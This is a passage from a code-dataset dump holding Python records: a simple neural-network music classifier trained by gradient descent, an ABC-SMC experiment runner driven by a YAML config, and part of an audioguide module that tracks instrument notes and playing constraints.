input_weight_update = input_weight - 0.1 * np.dot(training_data1.T, q)\n hidden_layer_weight_update = neuron_weight - 0.1 * np.dot(new_hidden_layer_output.T, delta_output)\n last_loss = loss_function_1\n input_weight = input_weight_update\n neuron_weight = hidden_layer_weight_update\nget_input_weight = input_weight\nget_neuron_weight = neuron_weight\nprint('GRADIENT DESCENT TRAINING COMPLETED!')\n\n\n# In[ ]:\n\n\n# Get weights\nmusic_weight_1 = sys.argv[4]\nwith open(music_weight_1) as csvfile:\n readCSV = csv.reader(csvfile)\n input_weight1 = []\n for i in readCSV:\n input_weight1.append(i)\ninput_weight = np.asarray(input_weight1,float)\n# Get weights\nmusic_weight_2 = sys.argv[5]\nwith open(music_weight_2) as csvfile:\n readCSV = csv.reader(csvfile)\n neuron_weight1 = []\n for i in readCSV:\n neuron_weight1.append(i)\nneuron_weight = np.asarray(neuron_weight1,float)\n\ns_sum_loss = 0\nfor w in range(0,15):\n for i in range(len(training_data)):\n s_hidden_layer_output = 1/(1+(np.exp(-np.dot(training_data[i], input_weight))))\n s_new_hidden_layer_output = np.insert(s_hidden_layer_output,0,1.0).reshape(1,-1)\n s_output = 1/(1+(np.exp(-np.dot(s_new_hidden_layer_output, neuron_weight)))) \n s_k = s_output - training_key[i]\n s_j = s_k * s_k\n s_loss_function_1 = 1/(2) * s_j\n# import pdb;pdb.set_trace()\n s_sum_loss += s_loss_function_1[0][0]\n s_delta_output = -(-s_k)*s_output*(1-s_output)\n s_new_hidden_layer_output1 = s_new_hidden_layer_output.reshape(1,-1)\n s_new_hidden_layer_output1 = s_new_hidden_layer_output1.T\n s_delta_hidden_layer = s_new_hidden_layer_output * (1-s_new_hidden_layer_output) * s_delta_output * neuron_weight.T\n s_q = np.delete(s_delta_hidden_layer, 0, axis=1)\n s_input_weight_update = input_weight - 0.4 * training_data[i].T * s_q\n s_hidden_layer_weight_update = neuron_weight - 0.4 * s_new_hidden_layer_output1* s_delta_output\n input_weight = s_input_weight_update\n neuron_weight = s_hidden_layer_weight_update\n print(s_sum_loss)\n s_sum_loss = 0\nprint('STOCHASTIC GRADIENT DESCENT TRAINING COMPLETED! 
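Both training loops above share one forward pass: sigmoid hidden layer, bias column prepended, sigmoid output. Factoring it out makes the batch and stochastic variants easier to compare; a sketch assuming the same array shapes:

import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def forward(x, w_in, w_out):
    h = sigmoid(x @ w_in)
    h = np.insert(h, 0, 1.0, axis=1)   # bias column, as in the loops above
    return h, sigmoid(h @ w_out)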
NOW PREDICTING.')\n\n\n# In[ ]:\n\n\n# Predicting\nmusic_dev = sys.argv[3]\nwith open(music_dev) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n music_dev = []\n for i in readCSV:\n music_dev.append(i)\n# Get the original value\ni_d = 0\nvalue_d = []\nyear_d = []\nlength_d = []\njazz_d = []\nrock_d = []\nnew_value_d = []\nfor row in music_dev:\n i_d +=1\n if i_d > 1:\n year_d.append(row[0])\n length_d.append(row[1])\n jazz_d.append(row[2])\n rock_d.append(row[3])\n value_d.append(row)\nmin_year_d = min(year_d)\nmax_year_d = max(year_d)\nmin_length_d = min(length_d)\nmax_length_d = max(length_d)\n\n# DO feature scaling and change \"yes\" to \"1.0\", \"no\" to \"0.0\"\nyear_new_d = []\nlength_new_d = []\njazz_new_d = []\nrock_new_d = []\nfor i in year_d:\n year_new_d.append((float(i)-float(min_year_d))/(float(max_year_d)-float(min_year_d)))\nfor i in length_d:\n length_new_d.append((float(i)-float(min_length_d))/(float(max_length_d)-float(min_length_d)))\nfor i in jazz_d:\n if i == \"yes\":\n jazz_new_d.append(1.0)\n if i == \"no\":\n jazz_new_d.append(0.0)\nfor i in rock_d:\n if i == \"yes\":\n rock_new_d.append(1.0)\n if i == \"no\":\n rock_new_d.append(0.0) \n \n# Get the new training set\ntraining_d = []\nfor i in range(len(year_new_d)):\n training_d.append([1.0, year_new_d[i], length_new_d[i], jazz_new_d[i], rock_new_d[i]])\ntraining_data_d = np.asarray(training_d)\nhidden_layer_output_d = 1/(1+(np.exp(-np.dot(training_data_d, get_input_weight))))\nnew_hidden_layer_output_d = np.insert(hidden_layer_output_d,0,1.0, axis=1)\noutput_d = 1/(1+(np.exp(-np.dot(new_hidden_layer_output_d, get_neuron_weight))))\nfor i in output_d:\n if i >= 0.5:\n print('yes')\n if i < 0.5:\n print('no')\n\n","sub_path":"NN_music.py","file_name":"NN_music.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36339746","text":"import algorithms\nfrom model_space import Model\nimport xml.etree.ElementTree as ET\nimport csv\nimport os\nfrom model_space import ModelSpace\nimport algorithm_utils as alg_utils\nimport numpy as np\nimport matplotlib as mpl\n\nimport matplotlib.pyplot as plt\nfrom operator import mul\nimport classification\nimport seaborn as sns;\n\nsns.set()\nfrom scipy.optimize import fsolve\nimport classification\n\nimport sys\nimport glob\n\nimport pandas as pd\nimport pickle\n\nimport tarfile\nimport yaml\nimport argparse\n\nfrom shutil import copy\n\n# Set time points\nparser = argparse.ArgumentParser()\nparser.add_argument('--config', type=str)\nparser.add_argument('--exp_suffix', type=int)\n\nargs = parser.parse_args()\n\nconfig_yaml_path = args.config\nexp_num = args.exp_suffix\n\nwith open(config_yaml_path, 'r') as yaml_file:\n experiment_config = yaml.load(yaml_file, Loader=yaml.FullLoader)\n experiment_config['final_epsilon'] = [float(x) for x in experiment_config['final_epsilon']]\n experiment_config['initial_epsilon'] = [float(x) for x in experiment_config['initial_epsilon']]\n\n# Unpack config file\ninput_folder = experiment_config['inputs_folder']\noutput_folder = experiment_config['output_folder']\nexperiment_name = experiment_config['experiment_name']\n\nt_0 = experiment_config['t_0']\nt_end = experiment_config['t_end']\ndt = experiment_config['dt']\nfit_species = experiment_config['fit_species']\nfinal_epsilon = experiment_config['final_epsilon']\ninitial_epsilon = experiment_config['initial_epsilon']\n\npopulation_size = experiment_config['population_size']\nn_sims_batch = 
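On the config side of the next record: yaml.load with an explicit FullLoader, as used above, works, but for plain-data configs yaml.safe_load is the usual choice and is equivalent to loading with SafeLoader:

import yaml

# Avoids arbitrary Python object construction for data-only configs.
with open(config_yaml_path) as fh:
    experiment_config = yaml.safe_load(fh)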
experiment_config['n_sims_batch']\n\ndistance_function_mode = experiment_config['distance_function_mode']\nrun_rejection = experiment_config['run_rejection']\nrun_SMC = experiment_config['run_SMC']\n\nalpha = experiment_config['alpha']\n\nabs_tol = float(experiment_config['abs_tol'])\nrel_tol = float(experiment_config['rel_tol'])\n\n\ndef import_input_file(input_path):\n data_dict = {}\n with open(input_path) as fin:\n reader = csv.reader(fin, skipinitialspace=True)\n for row in reader:\n data_dict[row[0]] = [float(i) for i in row[1:]]\n\n return data_dict\n\n\ndef ABCSMC():\n experiment_folder = experiment_name + '_' + str(exp_num)\n exp_output_folder = output_folder + experiment_folder + '/'\n print(exp_output_folder)\n\n latest_pickle_path = alg_utils.find_latest_population_pickle(exp_output_folder)\n print(latest_pickle_path)\n ABC_algs = None\n\n try:\n os.mkdir(exp_output_folder)\n\n except FileExistsError:\n pass\n\n # Load models from input files\n model_list = []\n for i in range(int((len(os.listdir(input_folder)) / 2))):\n input_params = input_folder + \"params_\" + str(i) + \".csv\"\n input_init_species = input_folder + \"species_\" + str(i) + \".csv\"\n init_params = import_input_file(input_params)\n init_species = import_input_file(input_init_species)\n\n model_new = Model(i, init_params, init_species)\n model_list.append(model_new)\n\n # Run ABC_rejection algorithm\n ABC_algs = algorithms.ABC(t_0, t_end, dt, exp_num=exp_num, model_list=model_list, population_size=population_size,\n n_sims_batch=n_sims_batch,\n fit_species=fit_species, initial_epsilon=initial_epsilon, final_epsilon=final_epsilon,\n distance_function_mode=distance_function_mode,\n n_distances=len(final_epsilon), abs_tol=abs_tol, rel_tol=rel_tol,\n out_dir=exp_output_folder)\n\n if run_rejection == \"Y\":\n ABC_algs.current_epsilon = final_epsilon\n\n ABC_algs.run_model_selection_ABC_SMC(alpha=alpha, run_test=0)\n\n copy(config_yaml_path, exp_output_folder)\n\n alg_utils.make_tarfile(exp_output_folder[0:-1] + \"_pop_\" + str(ABC_algs.population_number) + \".tar.gz\",\n exp_output_folder)\n\n\nif __name__ == \"__main__\":\n # for i in range(50):\n # steady_state_test(i)\n # ABCSMC_run_tests()\n # exit()\n # ABCSMC_run_gerlaud_test()\n ABCSMC()\n # ABC_rejection()\n # simulate_and_plot()\n # resample_and_plot_posterior()\n # ABC_rejection()\n # eig_classification_test()\n # repressilator_test()\n # exit()\n # ABC_rejection()\n","sub_path":"ABC/run_boost_rpr.py","file_name":"run_boost_rpr.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"103021265","text":"import os, sys\nimport numpy as np\nimport audioguide.util as util\n\n\n\n#########################\n## things to implement ##\n#########################\n# * enforced minimum of sounds per instrument per segment?\n# * change signal decomp to support MW - modolus of target segment times before concate?\n\n\n\n\n\n\n\n\n\n\ndef pitchoverride(cobjlist, config):\n\tpitchlist = [c.desc['MIDIPitch-seg'].get(None, None) for c in cobjlist]\n\tminpitch, maxpitch = min(pitchlist), max(pitchlist)\n\toutput_dict = {}\n\t\n\tfor c, standardpitch in zip(cobjlist, pitchlist):\n\t\tif config == None:\n\t\t\toutput_dict[c] = standardpitch\n\t\telif type(config) in [float, int]: # pitchoverride=60\n\t\t\toutput_dict[c] = config\n\t\telif type(config) != dict:\n\t\t\tutil.error(\"INSTRUMENTS\", 'pitchoverride must either be None, a number, or a dictionary.')\n\t\t# if passing this 
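import_input_file() reads rows of "name, v1, v2, ..." into a dict of float lists; a usage sketch with a hypothetical path, and file contents inferred from the parser:

# inputs/params_0.csv might hold rows like (hypothetical contents):
#   k_deg, 0.1, 0.5
#   n_hill, 2
params = import_input_file("inputs/params_0.csv")
# -> {"k_deg": [0.1, 0.5], "n_hill": [2.0]}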
point, we're using the dict format\n\t\telif 'type' in config and config['type'] == 'remap':\n\t\t\tassert 'low' in config and 'high' in config\n\t\t\tstandard_zerotoone = (standardpitch-minpitch)/(maxpitch-minpitch)\n\t\t\toutput_dict[c] = (standard_zerotoone*(config['high']-config['low']))+config['low']\n\t\t# clip\n\t\telif 'type' in config and config['type'] == 'clip':\n\t\t\tassert 'low' in config or 'high' in config\n\t\t\tif 'low' in config and standardpitch < config['low']: output_dict[c] = config['low']\n\t\t\telif 'high' in config and standardpitch > config['high']: output_dict[c] = config['high']\n\t\t\telse: output_dict[c] = standardpitch\n\t\t# filename string match\n\t\telif 'type' in config and config['type'] == 'file_match':\n\t\t\tfor k in config:\n\t\t\t\tif k == 'type': continue\n\t\t\t\tif util.matchString(c.printName, k, caseSensative=True):\n\t\t\t\t\toutput_dict[c] = config[k]\n\t\t\t# not found\n\t\t\toutput_dict[c] = standardpitch\n\t\telse:\n\t\t\tutil.error(\"INSTRUMENTS\", 'Ya done goofed son.')\n\treturn output_dict\n\n\n\nclass notetracker:\n\t'''tracks lots of info about notes that have been picked. provides data for testing the viability of future selections.'''\n\tinstrument_num_notes = 0\n\tnoninstrument_num_notes = 0\n\tinstrdata = {}\n\t########################################\n\tdef __init__(self, hopsize):\n\t\tself.hopsize = hopsize\n\t########################################\n\tdef addinstrument(self, instr, tgtlength, instrparams, cpsids, cpsparams):\n\t\t#self.instrToIdx[instr] = len(self.instrdata)\n\t\tself.instrdata[instr] = {'instr': {}, 'tech': {}, 'cps': {}, 'cpsids': cpsids}\n\t\t# set up instrument trackers\n\t\tself.instrdata[instr]['selected_notes'] = {}\n\t\tself.instrdata[instr]['overlaps'] = np.zeros(tgtlength, dtype=int)\n\t\t# set up technique trackers\n\t\tfor d in cpsparams:\n\t\t\tif 'technique' not in d or d['technique'] in self.instrdata[instr]['tech']: continue\n\t\t\tself.instrdata[instr]['tech'][d['technique']] = np.zeros(tgtlength, dtype=int)\t\n\t\t# set up cps voice trackers\n\t\tfor vc in cpsids:\n\t\t\tself.instrdata[instr]['cps'][vc] = np.zeros(tgtlength, dtype=int)\n\t########################################\n\tdef addnote(self, instr, cpsid, time, duration, midi, db, technique):\n\t\tif time not in self.instrdata[instr]['selected_notes']: self.instrdata[instr]['selected_notes'][time] = []\n\t\tself.instrdata[instr]['selected_notes'][time].append([duration, midi, db, cpsid])\n\t\tself.instrdata[instr]['overlaps'][time:time+duration] += 1\n\t\tself.instrdata[instr]['cps'][cpsid][time:time+duration] += 1\n\t\tif technique != None:\n\t\t\tself.instrdata[instr]['tech'][technique][time:time+duration] += 1\n\t\tself.instrument_num_notes += 1\n\t########################################\n\tdef _neighbor_notetimes(self, instr, time, cpsscope=None):\n\t\t'''returns None or notetime for previous and next notes'''\n\t\tprev = None\n\t\tnext = None\n\t\tfor notetime in self.instrdata[instr]['selected_notes'].keys():\n\t\t\tif cpsscope != None and self.instrdata[instr]['selected_notes'][notetime][0][3] not in cpsscope: continue\n\t\t\tif notetime < time and (prev == None or notetime > prev): prev = notetime\n\t\t\telif notetime > time and (next == None or notetime < next): next = notetime\n\t\treturn prev, next\n\t######################################\n\t## publically callable test methods ##\n\t######################################\n\tdef test_overlap_threshold(self, instr, time, insobj):\n\t\ttests = 
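pitchoverride's 'remap' mode is a linear range remap; note the original divides by (maxpitch - minpitch), which raises ZeroDivisionError when the corpus holds a single pitch. The underlying arithmetic as a standalone sketch:

def remap(value, in_lo, in_hi, out_lo, out_hi):
    # Normalise into [0, 1] against the corpus pitch range, then stretch
    # into the user's [low, high] range.
    t = (value - in_lo) / (in_hi - in_lo)   # fails if in_lo == in_hi
    return t * (out_hi - out_lo) + out_lo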
[self.instrdata[instr]['cps'][vc][time] >= insobj[instr]['cps'][vc]['polyphony_max_voices'] for vc in self.instrdata[instr]['cps']]\n\t\treturn True in tests\n\t########################################\n\tdef test_other_voice_is_active(self, instrumentsobj, instr, time, exclude_vc):\n\t\tothervoices = [vcid for vcid in self.instrdata[instr]['cps'] if self.instrdata[instr]['cps'][vcid][time] > 0 and vcid != exclude_vc and not instrumentsobj[instr]['cps'][vcid]['canPlayWhileDoingSomethingElse']]\n\t\treturn len(othervoices) > 0\n\t########################################\n\tdef test_minspeed(self, instr, time, vc, instrumentsobj, cpsscope=None):\n\t\tprev, next = self._neighbor_notetimes(instr, time, cpsscope=cpsscope)\n\t\t# test this time for polyphony\n\t\tif time in self.instrdata[instr]['selected_notes']:\n\t\t\tminspeed_in_frames = instrumentsobj.instruments[instr]['cps'][vc]['polyphony_minspeed_frames']\n\t\telse:\n\t\t\tminspeed_in_frames = instrumentsobj.instruments[instr]['cps'][vc]['minspeed_frames']\n\t\treturn (prev == None or time-prev >= minspeed_in_frames) and (next == None or next-time >= minspeed_in_frames)\n\t########################################\n\tdef get_invalid_techniques(self, instrumentsobj, time):\n\t\tinstrumentInvalidTechniques = {}\n\t\tfor i in instrumentsobj.instruments:\n\t\t\t# test to see what techniques are invalid according to \"technique_time_constraints\"\n\t\t\tinstrumentInvalidTechniques[i] = []\n\t\t\tfor (testtech, constrainingtech), frameseek in instrumentsobj.instruments[i]['technique_time_constraints'].items():\n\t\t\t\tif frameseek < 0: testf = (max(0, time+frameseek), time)\n\t\t\t\telse: testf = (time, time+frameseek)\n\t\t\t\tif constrainingtech not in self.instrdata[i]['tech']:\n\t\t\t\t\tprint(\"ERROR, %s doesn't have a technique called %s\"%(i, constrainingtech))\n\t\t\t\t\tsys.exit()\n\t\t\t\tif np.max(self.instrdata[i]['tech'][constrainingtech][testf[0]:testf[1]]) > 0:\n\t\t\t\t\tinstrumentInvalidTechniques[i].append(testtech)\n\t\treturn instrumentInvalidTechniques\n\t########################################\n\tdef get_chord_minmax(self, instr, time, vc):\n\t\tif time not in self.instrdata[instr]['selected_notes']: return None\n\t\tpitches = [p for d, p, db, vcidx in self.instrdata[instr]['selected_notes'][time] if vcidx == vc]\n\t\tdbs = [db for d, p, db, vcidx in self.instrdata[instr]['selected_notes'][time] if vcidx == vc]\n\t\tif len(pitches) == 0: return None\n\t\td = {'pitches': pitches, 'pitchmin': min(pitches), 'pitchmax': max(pitches), 'dbmin': min(dbs), 'dbmax': max(dbs)}\n\t\td['pitchrange'] = d['pitchmax']-d['pitchmin']\n\t\td['dbrange'] = d['dbmax']-d['dbmin']\n\t\treturn d\n\t########################################\n\tdef get_interval_restrictions(self, instrumentsobj, instr, vc, time):\n\t\ttests = []\n\t\tresults = []\n\t\tif len(instrumentsobj[instr]['cps'][vc]['interval_limit_breakpoints_frames']) > 0:\n\t\t\tprev, next = self._neighbor_notetimes(instr, time)\t\n\t\t\tlast_breakpoint_frames = instrumentsobj[instr]['cps'][vc]['interval_limit_breakpoints_frames'][-1][0] # since this list was sorted\n\t\t\tif prev != None:\n\t\t\t\t# ensure that prev is the last note's END time\n\t\t\t\tt = max(0, time - prev + max([n[0] for n in self.instrdata[instr]['selected_notes'][prev]]) )\n\t\t\t\tminp = min([n[1] for n in self.instrdata[instr]['selected_notes'][prev]])\n\t\t\t\tmaxp = max([n[1] for n in self.instrdata[instr]['selected_notes'][prev]])\n\t\t\t\ttests.append([t, minp, maxp])\n\t\t\tif next != None:\n\t\t\t\tminp = 
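test_minspeed() in plain terms: a candidate onset at frame t is valid only when both neighbouring selected onsets are far enough away, with a polyphony-specific minimum applying when a note already starts at t. A sketch of the core predicate:

def gap_ok(t, prev, nxt, min_frames):
    # prev/nxt are neighbouring onset frames, or None at the edges.
    return ((prev is None or t - prev >= min_frames) and
            (nxt is None or nxt - t >= min_frames))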
min([n[1] for n in self.instrdata[instr]['selected_notes'][next]])\n\t\t\t\tmaxp = max([n[1] for n in self.instrdata[instr]['selected_notes'][next]])\n\t\t\t\ttests.append([next-time, minp, maxp])\n\t\t\tfor tdiff, minp, maxp in tests:\n\t\t\t\tif tdiff > last_breakpoint_frames:\n\t\t\t\t\t# skip it since this time difference is greater than the last breakpoint time -- any interval is possible\n\t\t\t\t\tcontinue\n\t\t\t\tfor idx, (time, int) in enumerate(instrumentsobj[instr]['cps'][vc]['interval_limit_breakpoints_frames'][:-1]):\n\t\t\t\t\tnextrestriction = instrumentsobj[instr]['cps'][vc]['interval_limit_breakpoints_frames'][idx+1]\n\t\t\t\t\tif tdiff >= time and tdiff < nextrestriction[0]: break\n\t\t\t\ttimeinterpolate = (tdiff-time)/(nextrestriction[0]-time)\n\t\t\t\tintervalextrapolate = (timeinterpolate*(nextrestriction[1]-int))+int\n\t\t\t\tresults.append([maxp-intervalextrapolate, minp+intervalextrapolate])\n\t\tif instrumentsobj[instr]['cps'][vc]['interval_limit_range_per_sec'] != None:\n\t\t\tmin_max_within_a_second = [[], []]\n\t\t\ttimerange = (0.5/self.hopsize)\n\t\t\tfor notetime in self.instrdata[instr]['selected_notes'].keys():\n\t\t\t\t#if cpsscope != None and self.instrdata[instr]['selected_notes'][notetime][0][3] not in cpsscope: continue\n\t\t\t\tif notetime >= time-timerange and notetime <= time+timerange:\n\t\t\t\t\td = self.get_chord_minmax(instr, notetime, vc)\n\t\t\t\t\tmin_max_within_a_second[0].append(d['pitchmin'])\n\t\t\t\t\tmin_max_within_a_second[1].append(d['pitchmax'])\n\t\t\tif len(min_max_within_a_second[0]) > 0:\n\t\t\t\tminp = min(min_max_within_a_second[0])\n\t\t\t\tmaxp = max(min_max_within_a_second[1])\n\t\t\t\textra_room = instrumentsobj[instr]['cps'][vc]['interval_limit_range_per_sec']-(maxp-minp)\n\t\t\t\tresults.append([minp-extra_room, maxp+extra_room])\n\n\t\treturn results\t\t\n\n\n\n\n\n\n################################################################################\nclass instruments:\n\tdef __init__(self, scoreFromUserOptions, usercorpus, outputfile, tgtlength, cpsseglist, hopsizesec, p):\n\t\tself.active = scoreFromUserOptions != None and len(scoreFromUserOptions.instrumentobjs) != 0\n\t\tif not self.active: return\n\t\t#\n\t\tself.outputfile = outputfile\n\t\tself.tgtlength = tgtlength\n\t\tself.tracker = notetracker(hopsizesec)\n\t\tself.hopsizesec = hopsizesec\n\t\tself.instruments = {}\n\t\tself.instrument_names = []\n\t\tself.instrumentNameToIdx = {}\n\t\tfor iidx, ins in enumerate(scoreFromUserOptions.instrumentobjs):\n\t\t\tif ins.name not in self.instrument_names: self.instrument_names.append(ins.name)\n\t\t\tk = '%i-%s'%(iidx, ins.name)\n\t\t\tself.instrumentNameToIdx[k] = iidx\n\t\t\tself.instruments[k] = {}\n\t\t\tself.instruments[k]['notes'] = {}\n\t\t\tself.instruments[k]['params'] = ins\n\t\t\tself.instruments[k]['displayname'] = ins.name\n\t\t\tself.instruments[k]['cpsTags'] = ins.params['cpsTags']\n\t\t\tself.instruments[k]['selected_pitches'] = {}\n\t\t\t# this variable holds all valid voices for this instrument\n\t\t\tself.instruments[k]['cps'] = {}\n\t\t\tcpsids = [c.voiceID for c in usercorpus if c.instrTag in self.instruments[k]['cpsTags']]\n\t\t\tcpsparams = [c.instrParams for c in usercorpus if c.instrTag in self.instruments[k]['cpsTags']]\n\t\t\tself.tracker.addinstrument(k, tgtlength, ins.params, cpsids, cpsparams)\n\t\t\tfor c in usercorpus:\n\t\t\t\tif not c.instrTag in self.instruments[k]['cpsTags']: continue\n\t\t\t\tself.instruments[k]['cps'][c.voiceID] = ins.params.copy()\n\t\t\t\t# update with instrument 
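get_interval_restrictions() linearly interpolates the permitted melodic interval against the time gap to a neighbouring note, using the sorted (frames, interval) breakpoints. The interpolation isolated as a sketch:

def interval_limit(tdiff, breakpoints):
    # breakpoints: sorted list of (frames, max_interval) pairs.
    if tdiff > breakpoints[-1][0]:
        return None                      # beyond the last breakpoint: no limit
    for (t0, i0), (t1, i1) in zip(breakpoints, breakpoints[1:]):
        if t0 <= tdiff < t1:
            f = (tdiff - t0) / (t1 - t0)
            return i0 + f * (i1 - i0)
    return breakpoints[-1][1]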
params if not user-supplied at corpus level\n\t\t\t\t# add values if not supplied\n\t\t\t\tvoiceparam_defaults = {'technique': None, 'notehead': None, 'annotation': None, 'articulation': None, 'canPlayWhileDoingSomethingElse': False}\n\t\t\t\tvoiceparam_defaults.update(c.instrParams)\n\t\t\t\tself.instruments[k]['cps'][c.voiceID].update(voiceparam_defaults)\n\t\t\t\t# other internal shit\n\t\t\t\tself.instruments[k]['cps'][c.voiceID]['interval_limit_breakpoints_frames'] = []\n\t\t\t\tfor time, value in self.instruments[k]['cps'][c.voiceID]['interval_limit_breakpoints']:\n\t\t\t\t\tself.instruments[k]['cps'][c.voiceID]['interval_limit_breakpoints_frames'].append((self._s2f(time), value))\n\t\t\t\tself.instruments[k]['cps'][c.voiceID]['interval_limit_breakpoints_frames'].sort()\n\t\t\t\tif self.instruments[k]['cps'][c.voiceID]['polyphony_minspeed'] == None:\n\t\t\t\t\tself.instruments[k]['cps'][c.voiceID]['polyphony_minspeed'] = self.instruments[k]['cps'][c.voiceID]['minspeed']\n\t\t\t# temporal restrictions in hop-sized frames\n\t\t\tfor voiceID in self.instruments[k]['cps']:\n\t\t\t\tself.instruments[k]['cps'][voiceID]['minspeed_frames'] = self._s2f(self.instruments[k]['cps'][voiceID]['minspeed'])\n\t\t\t\tself.instruments[k]['cps'][voiceID]['polyphony_minspeed_frames'] = self._s2f(self.instruments[k]['cps'][voiceID]['polyphony_minspeed'])\n\t\t\tself.instruments[k]['technique_time_constraints'] = {}\n\t\t\tfor idx, (constrainingtech, querytech, timesec) in enumerate(ins.params['technique_switch_delay_map']):\n\t\t\t\t#self.instruments[k]['technique_switch_delay_map'].append([querytech, constrainingtech, self._s2f(timesec)])\n\t\t\t\tself.instruments[k]['technique_time_constraints'][(querytech, constrainingtech)] = -self._s2f(timesec)\n\t\t\t\t# add cross associations\n\t\t\t\tself.instruments[k]['technique_time_constraints'][(constrainingtech, querytech)] = self._s2f(timesec)\n\t\t\t# do dynamics\n\t\t\t# make pitch/dynamics matrix\n\t\t\tfor voiceID in self.instruments[k]['cps']:\n\t\t\t\tthiscps = [c for c in cpsseglist if c.voiceID == voiceID]\n\t\t\t\t# do pitch\n\t\t\t\tself.instruments[k]['cps'][voiceID]['cobj_to_pitch'] = pitchoverride(thiscps, self.instruments[k]['cps'][voiceID]['pitchoverride'])\n\t\t\t\t# do equally spaced dynamics\n\t\t\t\tthiscps_powersort = sorted(thiscps, key=lambda x: x.desc['power-seg'].get(None, None))\n\t\t\t\tself.instruments[k]['cps'][voiceID]['cobj_to_dyn'] = {}\n\t\t\t\tif len(self.instruments[k]['cps'][voiceID]['dynamics']) == 1:\n\t\t\t\t\tself.instruments[k]['cps'][voiceID]['cobj_to_dyn'] = {c: self.instruments[k]['cps'][voiceID]['dynamics'][0] for c in thiscps}\n\t\t\t\telse:\n\t\t\t\t\tfor idx, c in enumerate(thiscps_powersort):\n\t\t\t\t\t\tdynidx = int((idx/float(len(thiscps_powersort)-1))*(len(self.instruments[k]['cps'][voiceID]['dynamics'])-0.01))\n\t\t\t\t\t\tself.instruments[k]['cps'][voiceID]['cobj_to_dyn'][c] = self.instruments[k]['cps'][voiceID]['dynamics'][dynidx]\n\n\t\tself.scoreparams = scoreFromUserOptions.params\n\t########################################\n\tdef _s2f(self, timesec):\n\t\tframe = timesec/self.hopsizesec\n\t\tintframe = int(frame)\n\t\tif frame > intframe: intframe += 1\n\t\treturn intframe\n\t########################################\n\tdef _f2s(self, timeframe):\n\t\tsec = timeframe*self.hopsizesec\n\t\treturn sec\n\t########################################\n\tdef evaluate_voices(self, targettimeinframes, validVoicesList):\n\t\tif not self.active: return\t\t\n\t\tinstrumentInvalidTechniques = 
self.tracker.get_invalid_techniques(self, targettimeinframes)\n\t\t######\n\t\tself.valid_instruments_per_voice = {}\n\t\tfor vc in validVoicesList:\n\t\t\tself.valid_instruments_per_voice[vc] = []\n\t\t\tfor i in self.instruments:\t\t\t\n\t\t\t\t##########################\n\t\t\t\t## test if name matches ##\n\t\t\t\t##########################\n\t\t\t\tif vc not in self.instruments[i]['cps']:\n\t\t\t\t\tcontinue\n\t\t\t\t##########################################################################\n\t\t\t\t## see if any other sounds have already been chosen for this instrument ##\n\t\t\t\t##########################################################################\n\t\t\t\tif self.tracker.test_other_voice_is_active(self.instruments, i, targettimeinframes, vc):\n\t\t\t\t\tcontinue\n\t\t\t\t###########################################################################\n\t\t\t\t## see if overlaps are at a max for any other techniques for this instru ##\n\t\t\t\t###########################################################################\n\t\t\t\tif self.tracker.test_overlap_threshold(i, targettimeinframes, self.instruments): \t\n\t\t\t\t\tcontinue\n\t\t\t\t#####################################\n\t\t\t\t## TECHNIQUE temporal restrictions ##\n\t\t\t\t#####################################\n\t\t\t\tif self.instruments[i]['cps'][vc]['technique'] in instrumentInvalidTechniques[i]:\n\t\t\t\t\tcontinue\n\t\t\t\t###################################\n\t\t\t\t## MINSPEED temporal restriction ##\n\t\t\t\t###################################\n\t\t\t\tif not self.tracker.test_minspeed(i, targettimeinframes, vc, self):\n\t\t\t\t\tcontinue\n\t\t\t\t# otherwise add it\n\t\t\t\tself.valid_instruments_per_voice[vc].append(i)\n\t########################################\n\tdef setup_corpus_tests(self, tidx):\n\t\tif not self.active: return True\n\t\t'''creates a list of boolean tests for corpus segment pitch and dB that must be passed for a sample to be considered for selection'''\n\t\tself.instrument_tests = {}\n\t\t# loop through all instruments\n\t\tfor i in self.instruments:\t\n\t\t\t# loop through each voice available to each instrument\n\t\t\tfor v in self.instruments[i]['cps']:\n\t\t\t\t# set up the test dict\n\t\t\t\tself.instrument_tests[i, v] = {'pitch': [], 'pitch2': [], 'db2': []}\n\t\t\t\tminmaxdict = self.tracker.get_chord_minmax(i, tidx, v)\n\t\t\t\tif minmaxdict == None: \n\t\t\t\t\t# no other notes found here\n\t\t\t\t\tcontinue\n\t\t\t\t# max range\n\t\t\t\tif self.instruments[i]['cps'][v]['polyphony_max_range'] != None:\n\t\t\t\t\textra_room_in_range = self.instruments[i]['cps'][v]['polyphony_max_range']-minmaxdict['pitchrange']\n\t\t\t\t\tself.instrument_tests[i, v]['pitch2'].append('%%f >= %f and %%f <= %f'%(minmaxdict['pitchmin']-extra_room_in_range, minmaxdict['pitchmax']+extra_room_in_range))\n\t\t\t\t# min range\n\t\t\t\tif self.instruments[i]['cps'][v]['polyphony_min_range'] != None:\n\t\t\t\t\textra_room_in_minrange = self.instruments[i]['cps'][v]['polyphony_min_range']-minmaxdict['pitchrange']\n\t\t\t\t\tself.instrument_tests[i, v]['pitch2'].append('%%f <= %f or %%f >= %f'%(minmaxdict['pitchmin']-extra_room_in_minrange, minmaxdict['pitchmax']+extra_room_in_minrange))\n\t\t\t\t# unison tests\n\t\t\t\tif not self.instruments[i]['cps'][v]['polyphony_permit_unison']:\n\t\t\t\t\tfor p in minmaxdict['pitches']:\n\t\t\t\t\t\tself.instrument_tests[i, v]['pitch'].append('%%f != %f'%(p))\n\t\t\t\t# max db\n\t\t\t\tif self.instruments[i]['cps'][v]['polyphony_max_db_difference'] != 
